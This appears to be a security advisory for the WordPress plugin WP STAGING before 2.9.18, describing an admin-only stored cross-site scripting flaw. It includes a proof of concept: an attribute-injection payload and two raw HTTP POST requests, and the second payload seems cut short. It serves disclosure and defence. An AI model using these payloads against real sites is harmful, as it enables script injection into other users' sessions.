WP STAGING < 2.9.18 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

PoC

With the web browser inspector, change the input field type of settings such as “Maximum File Size (MB)” from number to text, then put the following payload in it and save: ’ style=animation-name:rotation onanimationstart=alert(/XSS/)// POST /wp-admin/options.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 401 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 option_page=wpstg_settings&action;=update&_wpnonce=174962afdc&wpstg;_settings%5BqueryLimit%5D=10000&wpstg;_settings%5BquerySRLimit%5D=20000&wpstg;_settings%5BfileLimit%5D=50&wpstg;_settings%5BmaxFileSize%5D=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS%2F%29%2F%2F&wpstg;_settings%5BbatchSize%5D=2&wpstg;_settings%5BcpuLoad%5D=low&wpstg;settings%5Boptimizer%5D=1&submit;=Save+Changes The XSS will be triggered when accessing the settings again The cloneName parameter is also affected when sent directly: POST /wp-admin/admin-ajax.php?action=wpstg_processing&=1660050565.855 HTTP/1.1 Accept: text/html, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 167 Connection: close Cookie: [admin+] action=wpstg_cloning&accessToken;=YgABqYyPC6Mru2kCQY4qI0mVfMxGxTopA6aR8GJJcsGvUCibhaqJWl5TDjIZfjVc&nonce;=eb3be2f317&cloneID;=ID&cloneName;="> The XSS will be triggered when viewing the Staging Site dashboard (and there is also a lack of escaping when updating the related Staging site)